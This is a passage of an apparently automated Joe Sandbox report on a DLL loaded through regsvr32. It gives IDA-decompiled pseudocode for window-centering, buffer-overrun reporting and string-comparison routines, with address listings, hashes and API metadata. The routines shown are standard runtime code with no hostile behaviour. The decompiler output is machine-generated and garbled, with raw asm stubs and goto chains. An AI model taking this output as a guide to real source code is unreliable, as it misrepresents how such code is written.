						if(_t100 != 0) {
							_t115 = _t100;
						}
					}
				} else {
					_t115 =  *(_t55 + 0x1c);
				}
				GetWindowRect( *(_t119 + 0x1c),  &_v44);
				if((_v5 & 0x00000040) != 0) {
					_t102 = GetParent( *(_t119 + 0x1c));
					GetClientRect(_t102,  &_v28);
					GetClientRect(_t115,  &_v60);
					MapWindowPoints(_t115, _t102,  &_v60, 2);
				} else {
					if(_t115 != 0) {
						_t99 = GetWindowLongA(_t115, 0xfffffff0);
						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
							_t115 = 0;
						}
					}
					_v100 = 0x28;
					if(_t115 != 0) {
						GetWindowRect(_t115,  &_v60);
						E10007B50(E10007AE5(_t115, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t90 = E10006C53();
						if(_t90 != 0) {
							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
						}
						E10007B50(E10007AE5(_t90, 1),  &_v100);
						CopyRect( &_v60,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t117 = _v44.right - _v44.left;
				asm("cdq");
				_t104 = _v44.bottom - _v44.top;
				asm("cdq");
				_t114 = _v60.bottom;
				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
				asm("cdq");
				asm("cdq");
				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
				if(_t110 >= _v28.left) {
					_t78 = _v28.right;
					if(_t117 + _t110 > _t78) {
						_t110 = _t78 - _v44.right + _v44.left;
					}
				} else {
					_t110 = _v28.left;
				}
				if(_t123 >= _v28.top) {
					if(_t104 + _t123 > _v28.bottom) {
						_t123 = _v44.top - _v44.bottom + _v28.bottom;
					}
				} else {
					_t123 = _v28.top;
				}
				return E100204FE(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
			}

























                                                                                                            0x100219dd
                                                                                                            0x100219e5
                                                                                                            0x100219e8
                                                                                                            0x100219f0
                                                                                                            0x100219f3
                                                                                                            0x100219f8
                                                                                                            0x10021a03
                                                                                                            0x10021a15
                                                                                                            0x10021a05
                                                                                                            0x10021a08
                                                                                                            0x10021a08
                                                                                                            0x10021a1b
                                                                                                            0x10021a1f
                                                                                                            0x10021a2b
                                                                                                            0x10021a33
                                                                                                            0x10021a35
                                                                                                            0x10021a35
                                                                                                            0x10021a33
                                                                                                            0x100219fa
                                                                                                            0x100219fa
                                                                                                            0x100219fa
                                                                                                            0x10021a44
                                                                                                            0x10021a4a
                                                                                                            0x10021aea
                                                                                                            0x10021af1
                                                                                                            0x10021af8
                                                                                                            0x10021b02
                                                                                                            0x10021a50
                                                                                                            0x10021a52
                                                                                                            0x10021a57
                                                                                                            0x10021a62
                                                                                                            0x10021a6b
                                                                                                            0x10021a6b
                                                                                                            0x10021a62
                                                                                                            0x10021a6f
                                                                                                            0x10021a76
                                                                                                            0x10021ab7
                                                                                                            0x10021ac6
                                                                                                            0x10021ad3
                                                                                                            0x10021a78
                                                                                                            0x10021a78
                                                                                                            0x10021a7f
                                                                                                            0x10021a81
                                                                                                            0x10021a81
                                                                                                            0x10021a91
                                                                                                            0x10021aa4
                                                                                                            0x10021aae
                                                                                                            0x10021aae
                                                                                                            0x10021a76
                                                                                                            0x10021b11
                                                                                                            0x10021b16
                                                                                                            0x10021b1c
                                                                                                            0x10021b23
                                                                                                            0x10021b26
                                                                                                            0x10021b2d
                                                                                                            0x10021b34
                                                                                                            0x10021b3b
                                                                                                            0x10021b42
                                                                                                            0x10021b47
                                                                                                            0x10021b4e
                                                                                                            0x10021b55
                                                                                                            0x10021b5d
                                                                                                            0x10021b5d
                                                                                                            0x10021b49
                                                                                                            0x10021b49
                                                                                                            0x10021b49
                                                                                                            0x10021b62
                                                                                                            0x10021b6e
                                                                                                            0x10021b76
                                                                                                            0x10021b76
                                                                                                            0x10021b64
                                                                                                            0x10021b64
                                                                                                            0x10021b64
                                                                                                            0x10021b8f

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 808654186-0
                                                                                                            • Opcode ID: e76da2122a763930bd691be976f21c44a84b6c1e628a4a4a2f822a10c9fdf520
                                                                                                            • Instruction ID: c5023cb8dd4c56e62e69e6e4efe16b58097a74c7fe0422dfe49a5ff72fe10001
                                                                                                            • Opcode Fuzzy Hash: e76da2122a763930bd691be976f21c44a84b6c1e628a4a4a2f822a10c9fdf520
                                                                                                            • Instruction Fuzzy Hash: 9A51AD76A00219AFDB01DBA8DC89FEEBBBDEF48350F154115E901F7281EB30B9458B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10016BAA Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 111COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 50%
                                                                                                            			E10016BAA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t32;
				intOrPtr* _t33;
				void* _t41;
				signed int _t54;
				unsigned int _t59;
				void* _t75;
				intOrPtr* _t76;
				signed int _t81;
				char* _t83;
				void* _t86;
				intOrPtr _t87;
				void* _t88;
				intOrPtr _t89;

				_push(0x118);
				_push(0x10042558);
				E10012514(__ebx, __edi, __esi);
				_t32 =  *0x1004c470; // 0xf3933a06
				 *((intOrPtr*)(_t88 - 0x1c)) = _t32;
				_t33 =  *0x1004f708; // 0x0
				if(_t33 == 0) {
					if( *((intOrPtr*)(_t88 + 8)) == 1) {
						_t83 = "Buffer overrun detected!";
						 *(_t88 - 0x128) = "A buffer overrun has been detected which has corrupted the program\'s\ninternal state.  The program cannot safely continue execution and must\nnow be terminated.\n";
						_t86 = 0xb9;
					} else {
						_t83 = "Unknown security failure detected!";
						 *(_t88 - 0x128) = "A security error of unknown cause has been detected which has\ncorrupted the program\'s internal state.  The program cannot safely\ncontinue execution and must now be terminated.\n";
						_t86 = 0xd4;
					}
					 *((char*)(_t88 - 0x20)) = 0;
					if(GetModuleFileNameA(0, _t88 - 0x124, 0x104) == 0) {
						E10017B90(_t88 - 0x124, "<program name unknown>");
					}
					_t71 = _t88 - 0x124;
					if(E10011820(_t88 - 0x124) + 0xb > 0x3c) {
						E10019E20(E10011820(_t71) + _t88 - 0xf3, "...", 3);
						_t89 = _t89 + 0x10;
					}
					_t41 = E10011820(_t71);
					_pop(_t75);
					E10010B20(_t41 + _t86 + 0x0000000c + 0x00000003 & 0xfffffffc, _t75);
					 *((intOrPtr*)(_t88 - 0x18)) = _t89;
					_t87 = _t89;
					E10017B90(_t87, _t83);
					E10017BA0(_t87, "\n\n");
					E10017BA0(_t87, "Program: ");
					E10017BA0(_t87, _t71);
					E10017BA0(_t87, "\n\n");
					E10017BA0(_t87,  *(_t88 - 0x128));
					_push(0x12010);
					_push("Microsoft Visual C++ Runtime Library");
					_push(_t87);
					E10019D1D();
					_t89 = _t89 + 0x3c;
				} else {
					 *(_t88 - 4) = 0;
					 *_t33( *((intOrPtr*)(_t88 + 8)),  *((intOrPtr*)(_t88 + 0xc)));
					 *(_t88 - 4) =  *(_t88 - 4) | 0xffffffff;
				}
				E10011F56(3);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t81 =  *(_t89 + 4);
				_t76 =  *((intOrPtr*)(_t89 + 8));
				if((_t81 & 0x00000003) != 0) {
					if((_t81 & 0x00000001) == 0) {
						L27:
						_t54 =  *_t81;
						_t81 = _t81 + 2;
						if(_t54 !=  *_t76) {
							goto L22;
						} else {
							_t54 = _t54;
							if(_t54 == 0) {
								goto L21;
							} else {
								if(_t54 !=  *((intOrPtr*)(_t76 + 1))) {
									goto L22;
								} else {
									if(_t54 == 0) {
										goto L21;
									} else {
										_t76 = _t76 + 2;
										goto L12;
									}
								}
							}
						}
					} else {
						_t54 =  *_t81;
						_t81 = _t81 + 1;
						if(_t54 !=  *_t76) {
							goto L22;
						} else {
							_t76 = _t76 + 1;
							if(_t54 == 0) {
								goto L21;
							} else {
								if((_t81 & 0x00000002) == 0) {
									goto L12;
								} else {
									goto L27;
								}
							}
						}
					}
				} else {
					while(1) {
						L12:
						_t54 =  *_t81;
						if(_t54 !=  *_t76) {
							break;
						}
						_t54 = _t54;
						if(_t54 == 0) {
							L21:
							return 0;
						} else {
							if(_t54 !=  *((intOrPtr*)(_t76 + 1))) {
								break;
							} else {
								_t59 = _t54;
								if(_t59 == 0) {
									goto L21;
								} else {
									_t54 = _t59 >> 0x10;
									if(_t54 !=  *((intOrPtr*)(_t76 + 2))) {
										break;
									} else {
										_t54 = _t54;
										if(_t54 == 0) {
											goto L21;
										} else {
											if(_t54 !=  *((intOrPtr*)(_t76 + 3))) {
												break;
											} else {
												_t76 = _t76 + 4;
												_t81 = _t81 + 4;
												if(_t54 != 0) {
													continue;
												} else {
													goto L21;
												}
											}
										}
									}
								}
							}
						}
						goto L32;
					}
					L22:
					asm("sbb eax, eax");
					return (_t54 << 1) + 1;
				}
				L32:
			}
















                                                                                                            0x10016baa
                                                                                                            0x10016baf
                                                                                                            0x10016bb4
                                                                                                            0x10016bb9
                                                                                                            0x10016bbe
                                                                                                            0x10016bc1
                                                                                                            0x10016bca
                                                                                                            0x10016bef
                                                                                                            0x10016c07
                                                                                                            0x10016c0c
                                                                                                            0x10016c16
                                                                                                            0x10016bf1
                                                                                                            0x10016bf1
                                                                                                            0x10016bf6
                                                                                                            0x10016c00
                                                                                                            0x10016c00
                                                                                                            0x10016c1b
                                                                                                            0x10016c33
                                                                                                            0x10016c41
                                                                                                            0x10016c47
                                                                                                            0x10016c48
                                                                                                            0x10016c5d
                                                                                                            0x10016c7c
                                                                                                            0x10016c81
                                                                                                            0x10016c81
                                                                                                            0x10016c85
                                                                                                            0x10016c8a
                                                                                                            0x10016c95
                                                                                                            0x10016c9a
                                                                                                            0x10016c9d
                                                                                                            0x10016ca1
                                                                                                            0x10016cad
                                                                                                            0x10016cb8
                                                                                                            0x10016cbf
                                                                                                            0x10016cc6
                                                                                                            0x10016cd2
                                                                                                            0x10016cd7
                                                                                                            0x10016cdc
                                                                                                            0x10016ce1
                                                                                                            0x10016ce2
                                                                                                            0x10016ce7
                                                                                                            0x10016bcc
                                                                                                            0x10016bcc
                                                                                                            0x10016bd5
                                                                                                            0x10016bd9
                                                                                                            0x10016bd9
                                                                                                            0x10016cec
                                                                                                            0x10016cf1
                                                                                                            0x10016cf2
                                                                                                            0x10016cf3
                                                                                                            0x10016cf4
                                                                                                            0x10016cf5
                                                                                                            0x10016cf6
                                                                                                            0x10016cf7
                                                                                                            0x10016cf8
                                                                                                            0x10016cf9
                                                                                                            0x10016cfa
                                                                                                            0x10016cfb
                                                                                                            0x10016cfc
                                                                                                            0x10016cfd
                                                                                                            0x10016cfe
                                                                                                            0x10016cff
                                                                                                            0x10016d00
                                                                                                            0x10016d04
                                                                                                            0x10016d0e
                                                                                                            0x10016d52
                                                                                                            0x10016d6c
                                                                                                            0x10016d6c
                                                                                                            0x10016d6f
                                                                                                            0x10016d74
                                                                                                            0x00000000
                                                                                                            0x10016d76
                                                                                                            0x10016d76
                                                                                                            0x10016d78
                                                                                                            0x00000000
                                                                                                            0x10016d7a
                                                                                                            0x10016d7d
                                                                                                            0x00000000
                                                                                                            0x10016d7f
                                                                                                            0x10016d81
                                                                                                            0x00000000
                                                                                                            0x10016d83
                                                                                                            0x10016d83
                                                                                                            0x00000000
                                                                                                            0x10016d83
                                                                                                            0x10016d81
                                                                                                            0x10016d7d
                                                                                                            0x10016d78
                                                                                                            0x10016d54
                                                                                                            0x10016d54
                                                                                                            0x10016d56
                                                                                                            0x10016d5b
                                                                                                            0x00000000
                                                                                                            0x10016d5d
                                                                                                            0x10016d5d
                                                                                                            0x10016d62
                                                                                                            0x00000000
                                                                                                            0x10016d64
                                                                                                            0x10016d6a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016d6a
                                                                                                            0x10016d62
                                                                                                            0x10016d5b
                                                                                                            0x10016d10
                                                                                                            0x10016d10
                                                                                                            0x10016d10
                                                                                                            0x10016d10
                                                                                                            0x10016d14
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016d16
                                                                                                            0x10016d18
                                                                                                            0x10016d40
                                                                                                            0x10016d42
                                                                                                            0x10016d1a
                                                                                                            0x10016d1d
                                                                                                            0x00000000
                                                                                                            0x10016d1f
                                                                                                            0x10016d1f
                                                                                                            0x10016d21
                                                                                                            0x00000000
                                                                                                            0x10016d23
                                                                                                            0x10016d23
                                                                                                            0x10016d29
                                                                                                            0x00000000
                                                                                                            0x10016d2b
                                                                                                            0x10016d2b
                                                                                                            0x10016d2d
                                                                                                            0x00000000
                                                                                                            0x10016d2f
                                                                                                            0x10016d32
                                                                                                            0x00000000
                                                                                                            0x10016d34
                                                                                                            0x10016d34
                                                                                                            0x10016d37
                                                                                                            0x10016d3c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016d3c
                                                                                                            0x10016d32
                                                                                                            0x10016d2d
                                                                                                            0x10016d29
                                                                                                            0x10016d21
                                                                                                            0x10016d1d
                                                                                                            0x00000000
                                                                                                            0x10016d18
                                                                                                            0x10016d44
                                                                                                            0x10016d44
                                                                                                            0x10016d4b
                                                                                                            0x10016d4b
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,10042558,00000118,10011796,00000001,00000000,10041D50,00000008,10016B00,00000000,00000000,00000000), ref: 10016C2B
                                                                                                            • _strlen.LIBCMT ref: 10016C51
                                                                                                            • _strlen.LIBCMT ref: 10016C62
                                                                                                            • _strncpy.LIBCMT ref: 10016C7C
                                                                                                            • _strlen.LIBCMT ref: 10016C85
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _strlen$FileModuleName_strncpy
                                                                                                            • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                                                                                            • API String ID: 2455649890-1673886896
                                                                                                            • Opcode ID: 1963d9bee1367311d52fddb125b014c05f3a23a3ac48ca314c1b8795c44db6bb
                                                                                                            • Instruction ID: 88295e5d41c60b50e9a3e58cda1e4c53c685b81e948abb858cf034152a287b35
                                                                                                            • Opcode Fuzzy Hash: 1963d9bee1367311d52fddb125b014c05f3a23a3ac48ca314c1b8795c44db6bb
                                                                                                            • Instruction Fuzzy Hash: 6731B476A052146BDB15DB60CC82FDE36B8EF05214F600169F514EF142DB38EBD18BA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001C425 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 291COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E1001C425(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t94;
				int _t95;
				int _t98;
				short* _t106;
				int _t109;
				short* _t111;
				short* _t118;
				short* _t119;
				short* _t126;
				char* _t132;
				char* _t133;
				long _t139;
				int _t141;
				int _t142;
				int _t143;
				int _t144;
				char _t154;
				char _t156;
				short* _t159;
				short* _t160;
				short* _t162;
				int _t165;
				void* _t166;
				void* _t167;
				short* _t168;
				void* _t173;

				_push(0x40);
				_push(0x10042fa0);
				E10012514(__ebx, __edi, __esi);
				_t94 =  *0x1004c470; // 0xf3933a06
				 *((intOrPtr*)(_t167 - 0x1c)) = _t94;
				_t162 = 0;
				_t165 = 1;
				_t173 =  *0x1004f8b0 - _t162; // 0x0
				if(_t173 == 0) {
					if(CompareStringW(0, 0, 0x10042704, 1, 0x10042704, 1) == 0) {
						_t139 = GetLastError();
						__eflags = _t139 - 0x78;
						if(_t139 == 0x78) {
							 *0x1004f8b0 = 2;
						}
					} else {
						 *0x1004f8b0 = 1;
					}
				}
				if( *(_t167 + 0x14) > _t162) {
					 *(_t167 + 0x14) = E1001C409( *(_t167 + 0x10),  *(_t167 + 0x14));
				}
				_t95 =  *(_t167 + 0x1c);
				if(_t95 > _t162) {
					_t95 = E1001C409( *(_t167 + 0x18), _t95);
					 *(_t167 + 0x1c) = _t95;
				}
				_t144 =  *0x1004f8b0; // 0x0
				_t141 = 2;
				if(_t144 == _t141 || _t144 == _t162) {
					 *(_t167 - 0x38) = _t162;
					__eflags =  *(_t167 + 8) - _t162;
					if( *(_t167 + 8) == _t162) {
						_t109 =  *0x1004f724; // 0x0
						 *(_t167 + 8) = _t109;
					}
					_t142 =  *(_t167 + 0x20);
					__eflags = _t142 - _t162;
					if(_t142 == _t162) {
						_t142 =  *0x1004f734; // 0x0
					}
					_t166 = E1001A444(_t142,  *(_t167 + 8));
					__eflags = _t166 - 0xffffffff;
					if(_t166 != 0xffffffff) {
						__eflags = _t166 - _t142;
						if(__eflags == 0) {
							L67:
							_t165 = CompareStringA( *(_t167 + 8),  *(_t167 + 0xc),  *(_t167 + 0x10),  *(_t167 + 0x14),  *(_t167 + 0x18),  *(_t167 + 0x1c));
							__eflags = _t162;
							if(__eflags != 0) {
								_push(_t162);
								E100107C8(_t142, _t162, _t165, __eflags);
								_push( *(_t167 - 0x38));
								E100107C8(_t142, _t162, _t165, __eflags);
							}
							goto L69;
						}
						_push(0);
						_push(0);
						_push(_t167 + 0x14);
						_push( *(_t167 + 0x10));
						_push(_t166);
						_push(_t142);
						_t162 = E1001A487(_t142, _t162, _t166, __eflags);
						__eflags = _t162;
						if(__eflags == 0) {
							goto L61;
						}
						_push(0);
						_push(0);
						_push(_t167 + 0x1c);
						_push( *(_t167 + 0x18));
						_push(_t166);
						_push(_t142);
						_t106 = E1001A487(_t142, _t162, _t166, __eflags);
						 *(_t167 - 0x38) = _t106;
						__eflags = _t106;
						if(__eflags != 0) {
							 *(_t167 + 0x10) = _t162;
							 *(_t167 + 0x18) =  *(_t167 - 0x38);
							goto L67;
						}
						_push(_t162);
						E100107C8(_t142, _t162, _t166, __eflags);
					}
					goto L61;
				} else {
					if(_t144 != _t165) {
						L61:
						_t98 = 0;
						L70:
						return E1001254F(E100117AE(_t98,  *((intOrPtr*)(_t167 - 0x1c))));
					}
					 *(_t167 - 0x3c) = _t162;
					 *(_t167 - 0x44) = _t162;
					 *(_t167 - 0x40) = _t162;
					if( *(_t167 + 0x20) == _t162) {
						_t144 =  *0x1004f734; // 0x0
						 *(_t167 + 0x20) = _t144;
					}
					if( *(_t167 + 0x14) == _t162 || _t95 == _t162) {
						if( *(_t167 + 0x14) != _t95) {
							__eflags = _t95 - _t165;
							if(_t95 > _t165) {
								L69:
								_t98 = _t165;
								goto L70;
							}
							__eflags =  *(_t167 + 0x14) - _t165;
							if( *(_t167 + 0x14) <= _t165) {
								_t111 = GetCPInfo( *(_t167 + 0x20), _t167 - 0x30);
								__eflags = _t111;
								if(_t111 == 0) {
									goto L61;
								}
								__eflags =  *(_t167 + 0x14) - _t162;
								if( *(_t167 + 0x14) <= _t162) {
									__eflags =  *(_t167 + 0x1c) - _t162;
									if( *(_t167 + 0x1c) <= _t162) {
										goto L38;
									}
									__eflags =  *(_t167 - 0x30) - _t141;
									if( *(_t167 - 0x30) < _t141) {
										goto L69;
									}
									_t132 = _t167 - 0x2a;
									__eflags =  *((char*)(_t167 - 0x2a));
									if( *((char*)(_t167 - 0x2a)) == 0) {
										goto L69;
									} else {
										goto L33;
									}
									while(1) {
										L33:
										_t159 =  *((intOrPtr*)(_t132 + 1));
										__eflags = _t159;
										if(_t159 == 0) {
											goto L69;
										}
										_t154 =  *( *(_t167 + 0x18));
										__eflags = _t154 -  *_t132;
										if(_t154 <  *_t132) {
											L36:
											_t132 = _t132 + _t141;
											__eflags =  *_t132;
											if( *_t132 != 0) {
												continue;
											}
											goto L69;
										}
										__eflags = _t154 - _t159;
										if(_t154 <= _t159) {
											goto L17;
										}
										goto L36;
									}
									goto L69;
								}
								__eflags =  *(_t167 - 0x30) - _t141;
								if( *(_t167 - 0x30) < _t141) {
									goto L20;
								}
								_t133 = _t167 - 0x2a;
								__eflags =  *((char*)(_t167 - 0x2a));
								if( *((char*)(_t167 - 0x2a)) == 0) {
									goto L20;
								} else {
									goto L25;
								}
								while(1) {
									L25:
									_t160 =  *((intOrPtr*)(_t133 + 1));
									__eflags = _t160;
									if(_t160 == 0) {
										goto L20;
									}
									_t156 =  *( *(_t167 + 0x10));
									__eflags = _t156 -  *_t133;
									if(_t156 <  *_t133) {
										L28:
										_t133 = _t133 + _t141;
										__eflags =  *_t133;
										if( *_t133 != 0) {
											continue;
										}
										goto L20;
									}
									__eflags = _t156 - _t160;
									if(_t156 <= _t160) {
										goto L17;
									}
									goto L28;
								}
							}
							L20:
							_t98 = 3;
							goto L70;
						}
						L17:
						_t98 = _t141;
						goto L70;
					} else {
						L38:
						_t143 = MultiByteToWideChar( *(_t167 + 0x20), 9,  *(_t167 + 0x10),  *(_t167 + 0x14), _t162, _t162);
						 *(_t167 - 0x48) = _t143;
						__eflags = _t143 - _t162;
						if(_t143 == _t162) {
							goto L61;
						}
						 *(_t167 - 4) = _t162;
						E10010B20(_t143 + _t143 + 0x00000003 & 0xfffffffc, _t144);
						 *(_t167 - 0x18) = _t168;
						 *(_t167 - 0x34) = _t168;
						 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
						_t118 =  *(_t167 - 0x34);
						__eflags = _t118 - _t162;
						if(_t118 != _t162) {
							L43:
							_t119 = MultiByteToWideChar( *(_t167 + 0x20), _t165,  *(_t167 + 0x10),  *(_t167 + 0x14), _t118, _t143);
							__eflags = _t119;
							if(_t119 == 0) {
								L53:
								__eflags =  *(_t167 - 0x3c);
								if(__eflags != 0) {
									_push( *(_t167 - 0x34));
									E100107C8(_t143, _t162, _t165, __eflags);
								}
								_t98 =  *(_t167 - 0x40);
								goto L70;
							}
							_t165 = MultiByteToWideChar( *(_t167 + 0x20), 9,  *(_t167 + 0x18),  *(_t167 + 0x1c), 0, 0);
							 *(_t167 - 0x4c) = _t165;
							__eflags = _t165;
							if(_t165 == 0) {
								goto L53;
							}
							 *(_t167 - 4) = 1;
							E10010B20(_t165 + _t165 + 0x00000003 & 0xfffffffc, _t144);
							 *(_t167 - 0x18) = _t168;
							_t162 = _t168;
							 *(_t167 - 0x50) = _t162;
							 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
							__eflags = _t162;
							if(_t162 != 0) {
								L49:
								_t126 = MultiByteToWideChar( *(_t167 + 0x20), 1,  *(_t167 + 0x18),  *(_t167 + 0x1c), _t162, _t165);
								__eflags = _t126;
								if(_t126 != 0) {
									 *(_t167 - 0x40) = CompareStringW( *(_t167 + 8),  *(_t167 + 0xc),  *(_t167 - 0x34), _t143, _t162, _t165);
								}
								__eflags =  *(_t167 - 0x44);
								if(__eflags != 0) {
									_push(_t162);
									E100107C8(_t143, _t162, _t165, __eflags);
								}
								goto L53;
							} else {
								_t162 = E100107B6(_t165 + _t165);
								__eflags = _t162;
								if(_t162 == 0) {
									goto L53;
								}
								 *(_t167 - 0x44) = 1;
								goto L49;
							}
						} else {
							_t118 = E100107B6(_t143 + _t143);
							_pop(_t144);
							 *(_t167 - 0x34) = _t118;
							__eflags = _t118 - _t162;
							if(_t118 == _t162) {
								goto L61;
							}
							 *(_t167 - 0x3c) = _t165;
							goto L43;
						}
					}
				}
			}





























                                                                                                            0x1001c425
                                                                                                            0x1001c427
                                                                                                            0x1001c42c
                                                                                                            0x1001c431
                                                                                                            0x1001c436
                                                                                                            0x1001c439
                                                                                                            0x1001c43d
                                                                                                            0x1001c43e
                                                                                                            0x1001c444
                                                                                                            0x1001c459
                                                                                                            0x1001c463
                                                                                                            0x1001c469
                                                                                                            0x1001c46c
                                                                                                            0x1001c46e
                                                                                                            0x1001c46e
                                                                                                            0x1001c45b
                                                                                                            0x1001c45b
                                                                                                            0x1001c45b
                                                                                                            0x1001c459
                                                                                                            0x1001c47b
                                                                                                            0x1001c489
                                                                                                            0x1001c489
                                                                                                            0x1001c48c
                                                                                                            0x1001c491
                                                                                                            0x1001c497
                                                                                                            0x1001c49d
                                                                                                            0x1001c49d
                                                                                                            0x1001c4a0
                                                                                                            0x1001c4a8
                                                                                                            0x1001c4ab
                                                                                                            0x1001c6ea
                                                                                                            0x1001c6ed
                                                                                                            0x1001c6f0
                                                                                                            0x1001c6f2
                                                                                                            0x1001c6f7
                                                                                                            0x1001c6f7
                                                                                                            0x1001c6fa
                                                                                                            0x1001c6fd
                                                                                                            0x1001c6ff
                                                                                                            0x1001c701
                                                                                                            0x1001c701
                                                                                                            0x1001c710
                                                                                                            0x1001c712
                                                                                                            0x1001c715
                                                                                                            0x1001c71b
                                                                                                            0x1001c71d
                                                                                                            0x1001c768
                                                                                                            0x1001c780
                                                                                                            0x1001c782
                                                                                                            0x1001c784
                                                                                                            0x1001c786
                                                                                                            0x1001c787
                                                                                                            0x1001c78c
                                                                                                            0x1001c78f
                                                                                                            0x1001c795
                                                                                                            0x00000000
                                                                                                            0x1001c784
                                                                                                            0x1001c71f
                                                                                                            0x1001c721
                                                                                                            0x1001c726
                                                                                                            0x1001c727
                                                                                                            0x1001c72a
                                                                                                            0x1001c72b
                                                                                                            0x1001c734
                                                                                                            0x1001c736
                                                                                                            0x1001c738
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c73a
                                                                                                            0x1001c73c
                                                                                                            0x1001c741
                                                                                                            0x1001c742
                                                                                                            0x1001c745
                                                                                                            0x1001c746
                                                                                                            0x1001c747
                                                                                                            0x1001c74f
                                                                                                            0x1001c752
                                                                                                            0x1001c754
                                                                                                            0x1001c75f
                                                                                                            0x1001c765
                                                                                                            0x00000000
                                                                                                            0x1001c765
                                                                                                            0x1001c756
                                                                                                            0x1001c757
                                                                                                            0x1001c75c
                                                                                                            0x00000000
                                                                                                            0x1001c4b9
                                                                                                            0x1001c4bb
                                                                                                            0x1001c717
                                                                                                            0x1001c717
                                                                                                            0x1001c798
                                                                                                            0x1001c7a8
                                                                                                            0x1001c7a8
                                                                                                            0x1001c4c1
                                                                                                            0x1001c4c4
                                                                                                            0x1001c4c7
                                                                                                            0x1001c4cd
                                                                                                            0x1001c4cf
                                                                                                            0x1001c4d5
                                                                                                            0x1001c4d5
                                                                                                            0x1001c4db
                                                                                                            0x1001c4e8
                                                                                                            0x1001c4f1
                                                                                                            0x1001c4f3
                                                                                                            0x1001c796
                                                                                                            0x1001c796
                                                                                                            0x00000000
                                                                                                            0x1001c796
                                                                                                            0x1001c4f9
                                                                                                            0x1001c4fc
                                                                                                            0x1001c50d
                                                                                                            0x1001c513
                                                                                                            0x1001c515
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c51b
                                                                                                            0x1001c51e
                                                                                                            0x1001c54b
                                                                                                            0x1001c54e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c550
                                                                                                            0x1001c553
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c559
                                                                                                            0x1001c55c
                                                                                                            0x1001c560
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c566
                                                                                                            0x1001c566
                                                                                                            0x1001c566
                                                                                                            0x1001c569
                                                                                                            0x1001c56b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c574
                                                                                                            0x1001c576
                                                                                                            0x1001c578
                                                                                                            0x1001c582
                                                                                                            0x1001c582
                                                                                                            0x1001c584
                                                                                                            0x1001c587
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c589
                                                                                                            0x1001c57a
                                                                                                            0x1001c57c
                                                                                                            0x00000000
